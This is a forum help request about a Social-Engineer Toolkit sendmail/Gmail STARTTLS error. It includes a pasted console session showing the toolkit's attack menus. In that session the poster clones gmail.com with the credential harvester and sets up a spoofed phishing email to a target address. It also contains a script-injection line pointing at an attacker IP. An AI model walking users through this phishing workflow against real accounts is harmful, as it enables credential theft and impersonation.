Hi,
A Engineering Social Toolkit Error I'm encountering is with sendmail. "Something went wrong, printing the error: (530: '5.7.0 MUST ISSUE A STARTTLS COMMAND FIRST . m5sm1906592pbh.70', 'XXXX@gmail.com')" I am attempting to send with a Gmail account.
Here are my options.
Anyone else has similar experiences? ThanksCode:
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit
Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default): 3
The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4): 2
Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into a report.
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]
Press {return} to continue.
Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.
Sendmail can take up to three minutes to start FYI.
Sendmail is set to ON. Would you like to start the server now?
Would you like to start Sendmail yes or no: yes
Be patient, it takes up to 3-5 minutes to start sometimes.
Starting sendmail:
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1
Enter who you want to send email to: xxxx@163.com
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1
Enter your GMAIL email address: xxxx@gmail.com
Enter your password for gmail (it will not be displayed back to you):
Do you want to flag this message/s as high priority? yes or no: yes
Enter the subject of the email: just cc
Do you want to send the message as html or plain?
1. HTML
2. Plain
Enter your choice (enter for plain): 2
Enter the body of the message, hit return for a new line.
Type your body and enter control+c when you are finished: 192.168.159.21
Next line of the body: fsdf
Next line of the body: fasdf
Next line of the body: ^C
Something went wrong, printing the error: (530, '5.7.0 Must issue a STARTTLS command first. m5sm1906592pbh.70', 'xxxx@gmail.com')
